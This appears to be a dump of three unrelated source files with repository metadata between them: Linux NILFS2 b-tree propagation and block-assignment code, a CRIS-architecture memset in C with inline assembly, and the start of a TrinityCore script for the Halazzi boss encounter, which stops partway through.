	 * (which was only prepared if it was not volatile) */
	while (--level > minlevel)
		nilfs_btree_abort_update_v(btree, path, level, dat);
	if (!buffer_nilfs_volatile(path[level].bp_bh))
		nilfs_btree_abort_update_v(btree, path, level, dat);
	return ret;
}
/*
 * nilfs_btree_commit_propagate_v - commit the ptr updates prepared by
 * nilfs_btree_prepare_propagate_v()
 * @btree: bmap struct of the b-tree
 * @path: lookup path
 * @minlevel: lowest prepared level (skipped if its buffer is volatile,
 *	matching what prepare did)
 * @maxlevel: highest prepared level
 * @bh: buffer that triggered the propagation (unused here)
 * @dat: DAT inode
 */
static void nilfs_btree_commit_propagate_v(struct nilfs_bmap *btree,
					   struct nilfs_btree_path *path,
					   int minlevel, int maxlevel,
					   struct buffer_head *bh,
					   struct inode *dat)
{
	int level;

	for (level = minlevel; level <= maxlevel; level++) {
		if (level == minlevel &&
		    buffer_nilfs_volatile(path[level].bp_bh))
			continue;
		nilfs_btree_commit_update_v(btree, path, level, dat);
	}
}
/*
 * nilfs_btree_propagate_v - propagate dirtiness up the tree (virtual
 * block number variant)
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the dirtied block
 * @level: level of the dirtied block
 * @bh: buffer of the dirtied block
 *
 * Reassigns virtual block numbers for the dirtied block and its clean
 * ancestors, committing them via the DAT.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_propagate_v(struct nilfs_bmap *btree,
				   struct nilfs_btree_path *path,
				   int level, struct buffer_head *bh)
{
	int maxlevel = 0, ret;
	struct nilfs_btree_node *parent;
	struct inode *dat = nilfs_bmap_get_dat(btree);
	__u64 ptr;
	int ncmax;

	get_bh(bh);
	path[level].bp_bh = bh;
	ret = nilfs_btree_prepare_propagate_v(btree, path, level, &maxlevel,
					      dat);
	if (ret < 0)
		goto out;

	/* a volatile buffer keeps its current ptr; just dirty its DAT
	 * entry so the allocator state gets written out */
	if (buffer_nilfs_volatile(path[level].bp_bh)) {
		parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
		ptr = nilfs_btree_node_get_ptr(parent,
					       path[level + 1].bp_index,
					       ncmax);
		ret = nilfs_dat_mark_dirty(dat, ptr);
		if (ret < 0)
			goto out;
	}

	nilfs_btree_commit_propagate_v(btree, path, level, maxlevel, bh, dat);

 out:
	brelse(path[level].bp_bh);
	path[level].bp_bh = NULL;
	return ret;
}
/*
 * nilfs_btree_propagate - propagate dirtiness of @bh to its ancestors
 * @btree: bmap struct of the b-tree
 * @bh: dirty buffer (either a data block or a b-tree node block)
 *
 * Looks up the block's position in the tree and dispatches to the
 * virtual (DAT-backed) or physical propagation routine.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_propagate(struct nilfs_bmap *btree,
				 struct buffer_head *bh)
{
	struct nilfs_btree_path *path;
	struct nilfs_btree_node *node;
	__u64 key;
	int level, ret;

	WARN_ON(!buffer_dirty(bh));

	path = nilfs_btree_alloc_path();
	if (path == NULL)
		return -ENOMEM;

	if (buffer_nilfs_node(bh)) {
		/* node block: its first key and stored level identify it */
		node = (struct nilfs_btree_node *)bh->b_data;
		key = nilfs_btree_node_get_key(node, 0);
		level = nilfs_btree_node_get_level(node);
	} else {
		key = nilfs_bmap_data_get_key(btree, bh);
		level = NILFS_BTREE_LEVEL_DATA;
	}

	ret = nilfs_btree_do_lookup(btree, path, key, NULL, level + 1, 0);
	if (ret < 0) {
		/* a dirty buffer must be reachable; ENOENT means the tree
		 * and the buffer are inconsistent */
		if (unlikely(ret == -ENOENT))
			printk(KERN_CRIT "%s: key = %llu, level == %d\n",
			       __func__, (unsigned long long)key, level);
		goto out;
	}

	ret = NILFS_BMAP_USE_VBN(btree) ?
		nilfs_btree_propagate_v(btree, path, level, bh) :
		nilfs_btree_propagate_p(btree, path, level, bh);

 out:
	nilfs_btree_free_path(path);

	return ret;
}
/*
 * nilfs_btree_propagate_gc - propagate dirtiness for a GC-moved block
 * @btree: bmap struct of the b-tree
 * @bh: dirty buffer being garbage-collected
 *
 * For GC blocks only the DAT entry for the block needs to be dirtied.
 */
static int nilfs_btree_propagate_gc(struct nilfs_bmap *btree,
				    struct buffer_head *bh)
{
	struct inode *dat = nilfs_bmap_get_dat(btree);

	return nilfs_dat_mark_dirty(dat, bh->b_blocknr);
}
/*
 * nilfs_btree_add_dirty_buffer - insert a dirty node buffer into the
 * per-level list, keeping each list sorted by first key
 * @btree: bmap struct of the b-tree
 * @lists: array of per-level list heads (indexed by node level)
 * @bh: dirty node buffer to add (a reference is taken)
 */
static void nilfs_btree_add_dirty_buffer(struct nilfs_bmap *btree,
					 struct list_head *lists,
					 struct buffer_head *bh)
{
	struct list_head *head;
	struct buffer_head *cbh;
	struct nilfs_btree_node *node, *cnode;
	__u64 key, ckey;
	int level;

	get_bh(bh);
	node = (struct nilfs_btree_node *)bh->b_data;
	key = nilfs_btree_node_get_key(node, 0);
	level = nilfs_btree_node_get_level(node);
	if (level < NILFS_BTREE_LEVEL_NODE_MIN ||
	    level >= NILFS_BTREE_LEVEL_MAX) {
		/* corrupted node: complain and skip it rather than index
		 * outside the lists array.
		 * NOTE(review): the reference taken by get_bh() above is
		 * not released on this path — looks like a leak; confirm */
		dump_stack();
		printk(KERN_WARNING
		       "%s: invalid btree level: %d (key=%llu, ino=%lu, "
		       "blocknr=%llu)\n",
		       __func__, level, (unsigned long long)key,
		       NILFS_BMAP_I(btree)->vfs_inode.i_ino,
		       (unsigned long long)bh->b_blocknr);
		return;
	}

	/* find the first entry with a larger key and insert before it */
	list_for_each(head, &lists[level]) {
		cbh = list_entry(head, struct buffer_head, b_assoc_buffers);
		cnode = (struct nilfs_btree_node *)cbh->b_data;
		ckey = nilfs_btree_node_get_key(cnode, 0);
		if (key < ckey)
			break;
	}
	list_add_tail(&bh->b_assoc_buffers, head);
}
/*
 * nilfs_btree_lookup_dirty_buffers - collect all dirty node buffers of
 * the b-tree onto @listp, lower levels first, each level key-sorted
 * @btree: bmap struct of the b-tree
 * @listp: output list the collected buffers are spliced onto
 */
static void nilfs_btree_lookup_dirty_buffers(struct nilfs_bmap *btree,
					     struct list_head *listp)
{
	struct address_space *btcache = &NILFS_BMAP_I(btree)->i_btnode_cache;
	struct list_head lists[NILFS_BTREE_LEVEL_MAX];
	struct pagevec pvec;
	struct buffer_head *bh, *head;
	pgoff_t index = 0;
	int level, i;

	for (level = NILFS_BTREE_LEVEL_NODE_MIN;
	     level < NILFS_BTREE_LEVEL_MAX;
	     level++)
		INIT_LIST_HEAD(&lists[level]);

	/* scan the btnode cache for dirty pages, bucketing each dirty
	 * buffer into its level list */
	pagevec_init(&pvec, 0);

	while (pagevec_lookup_tag(&pvec, btcache, &index, PAGECACHE_TAG_DIRTY,
				  PAGEVEC_SIZE)) {
		for (i = 0; i < pagevec_count(&pvec); i++) {
			bh = head = page_buffers(pvec.pages[i]);
			do {
				if (buffer_dirty(bh))
					nilfs_btree_add_dirty_buffer(btree,
								     lists, bh);
			} while ((bh = bh->b_this_page) != head);
		}
		pagevec_release(&pvec);
		cond_resched();
	}

	/* concatenate the per-level lists, lowest level first */
	for (level = NILFS_BTREE_LEVEL_NODE_MIN;
	     level < NILFS_BTREE_LEVEL_MAX;
	     level++)
		list_splice_tail(&lists[level], listp);
}
/*
 * nilfs_btree_assign_p - assign an on-disk block number to a block
 * (physical block number variant)
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the block
 * @level: level of the block
 * @bh: in/out: buffer of the block (may be replaced when rekeyed)
 * @blocknr: disk block number being assigned
 * @binfo: out: on-disk block information (DAT-less format)
 *
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_assign_p(struct nilfs_bmap *btree,
				struct nilfs_btree_path *path,
				int level,
				struct buffer_head **bh,
				sector_t blocknr,
				union nilfs_binfo *binfo)
{
	struct nilfs_btree_node *parent;
	__u64 key;
	__u64 ptr;
	int ncmax, ret;

	parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
	ptr = nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
				       ncmax);
	if (buffer_nilfs_node(*bh)) {
		/* node blocks are cached by block number; rekey the cache
		 * entry from the old ptr to the new disk block number */
		path[level].bp_ctxt.oldkey = ptr;
		path[level].bp_ctxt.newkey = blocknr;
		path[level].bp_ctxt.bh = *bh;
		ret = nilfs_btnode_prepare_change_key(
			&NILFS_BMAP_I(btree)->i_btnode_cache,
			&path[level].bp_ctxt);
		if (ret < 0)
			return ret;
		nilfs_btnode_commit_change_key(
			&NILFS_BMAP_I(btree)->i_btnode_cache,
			&path[level].bp_ctxt);
		*bh = path[level].bp_ctxt.bh;
	}

	/* record the new block number in the parent node */
	nilfs_btree_node_set_ptr(parent, path[level + 1].bp_index, blocknr,
				 ncmax);

	key = nilfs_btree_node_get_key(parent, path[level + 1].bp_index);
	/* on-disk format */
	binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
	binfo->bi_dat.bi_level = level;

	return 0;
}
/*
 * nilfs_btree_assign_v - assign an on-disk block number to a block
 * (virtual block number variant)
 * @btree: bmap struct of the b-tree
 * @path: lookup path for the block
 * @level: level of the block
 * @bh: in/out: buffer of the block (not modified in this variant)
 * @blocknr: disk block number being assigned
 * @binfo: out: on-disk block information (DAT-backed format)
 *
 * Binds the block's virtual block number to @blocknr in the DAT.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_assign_v(struct nilfs_bmap *btree,
				struct nilfs_btree_path *path,
				int level,
				struct buffer_head **bh,
				sector_t blocknr,
				union nilfs_binfo *binfo)
{
	struct nilfs_btree_node *parent;
	struct inode *dat = nilfs_bmap_get_dat(btree);
	__u64 key;
	__u64 ptr;
	union nilfs_bmap_ptr_req req;
	int ncmax, ret;

	parent = nilfs_btree_get_node(btree, path, level + 1, &ncmax);
	ptr = nilfs_btree_node_get_ptr(parent, path[level + 1].bp_index,
				       ncmax);
	req.bpr_ptr = ptr;
	ret = nilfs_dat_prepare_start(dat, &req.bpr_req);
	if (ret < 0)
		return ret;
	nilfs_dat_commit_start(dat, &req.bpr_req, blocknr);

	key = nilfs_btree_node_get_key(parent, path[level + 1].bp_index);
	/* on-disk format */
	binfo->bi_v.bi_vblocknr = cpu_to_le64(ptr);
	binfo->bi_v.bi_blkoff = cpu_to_le64(key);

	return 0;
}
/*
 * nilfs_btree_assign - assign a disk block number to a dirty buffer
 * @btree:   bmap being written out
 * @bh:      in/out buffer head (btree node or data block)
 * @blocknr: physical block number being assigned
 * @binfo:   receives the on-disk block info for the segment summary
 *
 * Determines the buffer's key and level (node header for btree nodes,
 * bmap data key for data blocks), looks up the parent path, then delegates
 * to the virtual (DAT) or physical assignment helper depending on whether
 * the bmap uses virtual block numbers.
 * Returns 0 on success or a negative error code.
 */
static int nilfs_btree_assign(struct nilfs_bmap *btree,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_path *path;
struct nilfs_btree_node *node;
__u64 key;
int level, ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
if (buffer_nilfs_node(*bh)) {
/* Btree node: first key and level come from the node header. */
node = (struct nilfs_btree_node *)(*bh)->b_data;
key = nilfs_btree_node_get_key(node, 0);
level = nilfs_btree_node_get_level(node);
} else {
/* Data block: key is its file block offset. */
key = nilfs_bmap_data_get_key(btree, *bh);
level = NILFS_BTREE_LEVEL_DATA;
}
/* Look up the parent of the target, hence level + 1. */
ret = nilfs_btree_do_lookup(btree, path, key, NULL, level + 1, 0);
if (ret < 0) {
/* A dirty buffer must be reachable; ENOENT indicates corruption. */
WARN_ON(ret == -ENOENT);
goto out;
}
ret = NILFS_BMAP_USE_VBN(btree) ?
nilfs_btree_assign_v(btree, path, level, bh, blocknr, binfo) :
nilfs_btree_assign_p(btree, path, level, bh, blocknr, binfo);
 out:
nilfs_btree_free_path(path);
return ret;
}
/*
 * nilfs_btree_assign_gc - assign a block number during garbage collection
 * @btree:   bmap being collected
 * @bh:      buffer head of the block being moved
 * @blocknr: new physical block number
 * @binfo:   receives the on-disk block info (bi_v variant)
 *
 * GC variant of nilfs_btree_assign(): no path lookup is needed, the DAT
 * entry for the buffer's virtual block number ((*bh)->b_blocknr here) is
 * simply moved to @blocknr.
 * Returns 0 on success or a negative error from nilfs_dat_move().
 */
static int nilfs_btree_assign_gc(struct nilfs_bmap *btree,
struct buffer_head **bh,
sector_t blocknr,
union nilfs_binfo *binfo)
{
struct nilfs_btree_node *node;
__u64 key;
int ret;
ret = nilfs_dat_move(nilfs_bmap_get_dat(btree), (*bh)->b_blocknr,
blocknr);
if (ret < 0)
return ret;
if (buffer_nilfs_node(*bh)) {
node = (struct nilfs_btree_node *)(*bh)->b_data;
key = nilfs_btree_node_get_key(node, 0);
} else
key = nilfs_bmap_data_get_key(btree, *bh);
/* on-disk format */
binfo->bi_v.bi_vblocknr = cpu_to_le64((*bh)->b_blocknr);
binfo->bi_v.bi_blkoff = cpu_to_le64(key);
return 0;
}
/*
 * nilfs_btree_mark - mark the block at (@key, @level) dirty
 * @btree: bmap to operate on
 * @key:   key of the block to mark
 * @level: level of the block to mark
 *
 * Looks up the block's pointer via its parent (level + 1), reads the block,
 * marks its buffer dirty, and flags the bmap itself dirty so the change is
 * picked up by the next segment write.
 * Returns 0 on success or a negative error code; ENOENT triggers a WARN_ON
 * since the caller is expected to pass an existing block.
 */
static int nilfs_btree_mark(struct nilfs_bmap *btree, __u64 key, int level)
{
struct buffer_head *bh;
struct nilfs_btree_path *path;
__u64 ptr;
int ret;
path = nilfs_btree_alloc_path();
if (path == NULL)
return -ENOMEM;
ret = nilfs_btree_do_lookup(btree, path, key, &ptr, level + 1, 0);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
goto out;
}
ret = nilfs_btree_get_block(btree, ptr, &bh);
if (ret < 0) {
WARN_ON(ret == -ENOENT);
goto out;
}
/* Avoid redundant dirtying work when already dirty. */
if (!buffer_dirty(bh))
mark_buffer_dirty(bh);
brelse(bh);
if (!nilfs_bmap_dirty(btree))
nilfs_bmap_set_dirty(btree);
 out:
nilfs_btree_free_path(path);
return ret;
}
/* Full operation vector used for normal (non-GC) btree-backed bmaps. */
static const struct nilfs_bmap_operations nilfs_btree_ops = {
.bop_lookup = nilfs_btree_lookup,
.bop_lookup_contig = nilfs_btree_lookup_contig,
.bop_insert = nilfs_btree_insert,
.bop_delete = nilfs_btree_delete,
.bop_clear = NULL,
.bop_propagate = nilfs_btree_propagate,
.bop_lookup_dirty_buffers = nilfs_btree_lookup_dirty_buffers,
.bop_assign = nilfs_btree_assign,
.bop_mark = nilfs_btree_mark,
.bop_last_key = nilfs_btree_last_key,
.bop_check_insert = NULL,
.bop_check_delete = nilfs_btree_check_delete,
.bop_gather_data = nilfs_btree_gather_data,
};
/*
 * Reduced operation vector for GC inodes: only propagation, dirty-buffer
 * lookup and GC-style assignment are meaningful during collection.
 */
static const struct nilfs_bmap_operations nilfs_btree_ops_gc = {
.bop_lookup = NULL,
.bop_lookup_contig = NULL,
.bop_insert = NULL,
.bop_delete = NULL,
.bop_clear = NULL,
.bop_propagate = nilfs_btree_propagate_gc,
.bop_lookup_dirty_buffers = nilfs_btree_lookup_dirty_buffers,
.bop_assign = nilfs_btree_assign_gc,
.bop_mark = NULL,
.bop_last_key = NULL,
.bop_check_insert = NULL,
.bop_check_delete = NULL,
.bop_gather_data = NULL,
};
/*
 * nilfs_btree_init - attach the btree operation vector to @bmap and cache
 * the per-block child capacity.  Always returns 0.
 */
int nilfs_btree_init(struct nilfs_bmap *bmap)
{
bmap->b_ops = &nilfs_btree_ops;
bmap->b_nchildren_per_block =
NILFS_BTREE_NODE_NCHILDREN_MAX(nilfs_btree_node_size(bmap));
return 0;
}
/*
 * nilfs_btree_init_gc - like nilfs_btree_init() but installs the reduced
 * GC operation vector (used for garbage-collection inodes).
 */
void nilfs_btree_init_gc(struct nilfs_bmap *bmap)
{
bmap->b_ops = &nilfs_btree_ops_gc;
bmap->b_nchildren_per_block =
NILFS_BTREE_NODE_NCHILDREN_MAX(nilfs_btree_node_size(bmap));
}
| gpl-2.0 |
estiko/kernel_smartfren_d5c | arch/cris/arch-v32/lib/memset.c | 27906 | 7459 | /* A memset for CRIS.
Copyright (C) 1999-2005 Axis Communications.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Neither the name of Axis Communications nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AXIS COMMUNICATIONS AND ITS CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL AXIS
COMMUNICATIONS OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
/* FIXME: This file should really only be used for reference, as the
result is somewhat depending on gcc generating what we expect rather
than what we describe. An assembly file should be used instead. */
/* Note the multiple occurrence of the expression "12*4", including the
asm. It is hard to get it into the asm in a good way. Thus better to
expose the problem everywhere: no macro. */
/* Assuming one cycle per dword written or read (ok, not really true; the
world is not ideal), and one cycle per instruction, then 43+3*(n/48-1)
<= 24+24*(n/48-1) so n >= 45.7; n >= 0.9; we win on the first full
48-byte block to set. */
#define MEMSET_BY_BLOCK_THRESHOLD (1 * 48)
/* No name ambiguities in this file. */
__asm__ (".syntax no_register_prefix");
/*
 * CRIS memset: fills plen bytes at pdst with byte c and returns pdst.
 * Strategy: replicate c into all four bytes of a register, align the
 * destination to 4 bytes, bulk-set 48-byte blocks with movem (asm), then
 * finish with a 16-byte unrolled loop and a 0..15-byte switch tail.
 * NOTE(review): in the first asm below the constraint annotations were
 * swapped ("=r" is the output operand, "0" the tied input) — comments
 * corrected here; the code itself was already right.
 */
void *memset(void *pdst, int c, unsigned int plen)
{
/* Now we want the parameters in special registers. Make sure the
compiler does something usable with this. */
register char *return_dst __asm__ ("r10") = pdst;
register int n __asm__ ("r12") = plen;
register int lc __asm__ ("r11") = c;
/* Most apps use memset sanely. Memsetting about 3..4 bytes or less get
penalized here compared to the generic implementation. */
/* This is fragile performancewise at best. Check with newer GCC
releases, if they compile cascaded "x |= x << 8" to sane code. */
/* Broadcast the low byte of lc into all four bytes of the word. */
__asm__("movu.b %0,r13 \n\
lslq 8,r13 \n\
move.b %0,r13 \n\
move.d r13,%0 \n\
lslq 16,r13 \n\
or.d r13,%0"
: "=r" (lc) /* Outputs. */
: "0" (lc) /* Inputs. */
: "r13"); /* Trash. */
{
register char *dst __asm__ ("r13") = pdst;
/* Align dst to a 4-byte boundary before word/block stores. */
if (((unsigned long) pdst & 3) != 0
/* Oops! n = 0 must be a valid call, regardless of alignment. */
&& n >= 3)
{
if ((unsigned long) dst & 1)
{
*dst = (char) lc;
n--;
dst++;
}
if ((unsigned long) dst & 2)
{
*(short *) dst = lc;
n -= 2;
dst += 2;
}
}
/* Decide which setting method to use. */
if (n >= MEMSET_BY_BLOCK_THRESHOLD)
{
/* It is not optimal to tell the compiler about clobbering any
registers; that will move the saving/restoring of those registers
to the function prologue/epilogue, and make non-block sizes
suboptimal. */
__asm__ volatile
("\
;; GCC does promise correct register allocations, but let's \n\
;; make sure it keeps its promises. \n\
.ifnc %0-%1-%4,$r13-$r12-$r11 \n\
.error \"GCC reg alloc bug: %0-%1-%4 != $r13-$r12-$r11\" \n\
.endif \n\
\n\
;; Save the registers we'll clobber in the movem process \n\
;; on the stack. Don't mention them to gcc, it will only be \n\
;; upset. \n\
subq 11*4,sp \n\
movem r10,[sp] \n\
\n\
move.d r11,r0 \n\
move.d r11,r1 \n\
move.d r11,r2 \n\
move.d r11,r3 \n\
move.d r11,r4 \n\
move.d r11,r5 \n\
move.d r11,r6 \n\
move.d r11,r7 \n\
move.d r11,r8 \n\
move.d r11,r9 \n\
move.d r11,r10 \n\
\n\
;; Now we've got this: \n\
;; r13 - dst \n\
;; r12 - n \n\
\n\
;; Update n for the first loop \n\
subq 12*4,r12 \n\
0: \n\
"
#ifdef __arch_common_v10_v32
/* Cater to branch offset difference between v32 and v10. We
assume the branch below has an 8-bit offset. */
" setf\n"
#endif
" subq 12*4,r12 \n\
bge 0b \n\
movem r11,[r13+] \n\
\n\
;; Compensate for last loop underflowing n. \n\
addq 12*4,r12 \n\
\n\
;; Restore registers from stack. \n\
movem [sp+],r10"
/* Outputs. */
: "=r" (dst), "=r" (n)
/* Inputs. */
: "0" (dst), "1" (n), "r" (lc));
}
/* An ad-hoc unroll, used for 4*12-1..16 bytes. */
while (n >= 16)
{
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
n -= 16;
}
/* Tail: n is now 0..15; store the exact remainder with no loop. */
switch (n)
{
case 0:
break;
case 1:
*dst = (char) lc;
break;
case 2:
*(short *) dst = (short) lc;
break;
case 3:
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 4:
*(long *) dst = lc;
break;
case 5:
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 6:
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 7:
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 8:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc;
break;
case 9:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 10:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 11:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
case 12:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc;
break;
case 13:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*dst = (char) lc;
break;
case 14:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc;
break;
case 15:
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(long *) dst = lc; dst += 4;
*(short *) dst = (short) lc; dst += 2;
*dst = (char) lc;
break;
}
}
return return_dst;
}
| gpl-2.0 |
EndScene/Catherine_3.3.5a | src/server/scripts/EasternKingdoms/ZulAman/boss_halazzi.cpp | 3 | 14230 | /*
* Copyright (C) 2008-2013 TrinityCore <http://www.trinitycore.org/>
* Copyright (C) 2006-2009 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/* ScriptData
SDName: boss_Halazzi
SD%Complete: 80
SDComment:
SDCategory: Zul'Aman
EndScriptData */
#include "ScriptMgr.h"
#include "ScriptedCreature.h"
#include "zulaman.h"
#include "SpellInfo.h"
// Yell texts and matching sound-kit ids for the Halazzi encounter.
// NOTE(review): YELL_SABER_ONE/YELL_SABER_TWO are defined but not used in
// this file, and YELL_SPLIT duplicates the SABER_TWO text — presumably the
// split yell should have its own line; confirm against sniff data.
#define YELL_AGGRO "Get on your knees and bow to da fang and claw!"
#define SOUND_AGGRO 12020
#define YELL_SABER_ONE "You gonna leave in pieces!"
#define YELL_SABER_TWO "Me gonna carve ya now!"
#define YELL_SPLIT "Me gonna carve ya now!"
#define SOUND_SPLIT 12021
#define YELL_MERGE "Spirit, come back to me!"
#define SOUND_MERGE 12022
#define YELL_KILL_ONE "You cant fight the power!"
#define SOUND_KILL_ONE 12026
#define YELL_KILL_TWO "You gonna fail!"
#define SOUND_KILL_TWO 12027
#define YELL_DEATH "Chaga... choka'jinn."
#define SOUND_DEATH 12028
#define YELL_BERSERK "Whatch you be doing? Pissin' yourselves..."
#define SOUND_BERSERK 12025
// Spell ids used by Halazzi and his spirit lynx add.
enum Spells
{
SPELL_DUAL_WIELD = 29651,
SPELL_SABER_LASH = 43267,
SPELL_FRENZY = 43139,
SPELL_FLAMESHOCK = 43303,
SPELL_EARTHSHOCK = 43305,
SPELL_TRANSFORM_SPLIT = 43142,
SPELL_TRANSFORM_SPLIT2 = 43573,
SPELL_TRANSFORM_MERGE = 43271,
SPELL_SUMMON_LYNX = 43143,
SPELL_SUMMON_TOTEM = 43302,
SPELL_BERSERK = 45078,
SPELL_LYNX_FRENZY = 43290, // Used by Spirit Lynx
SPELL_SHRED_ARMOR = 43243 // Used by Spirit Lynx
};
// Creature entries summoned during the encounter.
enum Hal_CreatureIds
{
NPC_SPIRIT_LYNX = 24143,
NPC_TOTEM = 24224
};
// Encounter state machine: LYNX -> SPLIT -> HUMAN -> MERGE cycles until
// TransformCount reaches 3, then ENRAGE (see boss_halazziAI::EnterPhase).
enum PhaseHalazzi
{
PHASE_NONE = 0,
PHASE_LYNX = 1,
PHASE_SPLIT = 2,
PHASE_HUMAN = 3,
PHASE_MERGE = 4,
PHASE_ENRAGE = 5
};
// Script for Halazzi (Zul'Aman). The AI drives the phase cycle declared in
// PhaseHalazzi: in lynx form he splits at health thresholds, fights in human
// form alongside a spirit-lynx add, re-merges when either drops low, and
// enrages after the third merge.
class boss_halazzi : public CreatureScript
{
public:
boss_halazzi()
: CreatureScript("boss_halazzi")
{
}
struct boss_halazziAI : public ScriptedAI
{
boss_halazziAI(Creature* creature) : ScriptedAI(creature)
{
instance = creature->GetInstanceScript();
}
InstanceScript* instance;
// Cooldown trackers, all in milliseconds and counted down in UpdateAI().
uint32 FrenzyTimer;
uint32 SaberlashTimer;
uint32 ShockTimer;
uint32 TotemTimer;
uint32 CheckTimer;
uint32 BerserkTimer;
// Number of completed merges (0..3); also scales lynx-form health.
uint32 TransformCount;
PhaseHalazzi Phase;
uint64 LynxGUID;
// Restore pristine state and start (or restart) in lynx phase.
void Reset()
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, NOT_STARTED);
LynxGUID = 0;
TransformCount = 0;
BerserkTimer = 600000; // 10-minute hard enrage
CheckTimer = 1000;
DoCast(me, SPELL_DUAL_WIELD, true);
Phase = PHASE_NONE;
EnterPhase(PHASE_LYNX);
}
void EnterCombat(Unit* /*who*/)
{
if (instance)
instance->SetData(DATA_HALAZZIEVENT, IN_PROGRESS);
me->MonsterYell(YELL_AGGRO, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_AGGRO);
EnterPhase(PHASE_LYNX);
}
// Remember the spirit lynx's GUID so we can merge with it later.
void JustSummoned(Creature* summon)
{
summon->AI()->AttackStart(me->GetVictim());
if (summon->GetEntry() == NPC_SPIRIT_LYNX)
LynxGUID = summon->GetGUID();
}
// Halazzi cannot actually die until the enrage phase.
void DamageTaken(Unit* /*done_by*/, uint32 &damage)
{
if (damage >= me->GetHealth() && Phase != PHASE_ENRAGE)
damage = 0;
}
// The split transform spell signals when the human phase begins.
void SpellHit(Unit*, const SpellInfo* spell)
{
if (spell->Id == SPELL_TRANSFORM_SPLIT2)
EnterPhase(PHASE_HUMAN);
}
// While merging he walks toward the lynx instead of chasing targets.
void AttackStart(Unit* who)
{
if (Phase != PHASE_MERGE) ScriptedAI::AttackStart(who);
}
// Central phase transition: applies per-phase health/timers/visuals.
void EnterPhase(PhaseHalazzi NextPhase)
{
switch (NextPhase)
{
case PHASE_LYNX:
case PHASE_ENRAGE:
if (Phase == PHASE_MERGE)
{
DoCast(me, SPELL_TRANSFORM_MERGE, true);
me->Attack(me->GetVictim(), true);
me->GetMotionMaster()->MoveChase(me->GetVictim());
}
if (Creature* Lynx = Unit::GetCreature(*me, LynxGUID))
Lynx->DisappearAndDie();
// Lynx-form health shrinks by 150k per completed merge.
me->SetMaxHealth(600000);
me->SetHealth(600000 - 150000 * TransformCount);
FrenzyTimer = 16000;
SaberlashTimer = 20000;
ShockTimer = 10000;
TotemTimer = 12000;
break;
case PHASE_SPLIT:
me->MonsterYell(YELL_SPLIT, LANG_UNIVERSAL, 0);
DoPlaySoundToSet(me, SOUND_SPLIT);
DoCast(me, SPELL_TRANSFORM_SPLIT, true);
break;
case PHASE_HUMAN:
//DoCast(me, SPELL_SUMMON_LYNX, true);
DoSpawnCreature(NPC_SPIRIT_LYNX, 5, 5, 0, 0, TEMPSUMMON_CORPSE_DESPAWN, 0);
me->SetMaxHealth(400000);
me->SetHealth(400000);
ShockTimer = 10000;
TotemTimer = 12000;
break;
case PHASE_MERGE:
if (Unit* pLynx = Unit::GetUnit(*me, LynxGUID))
{
me->MonsterYell(YELL_MERGE, LANG_UNIVERSAL, 0);
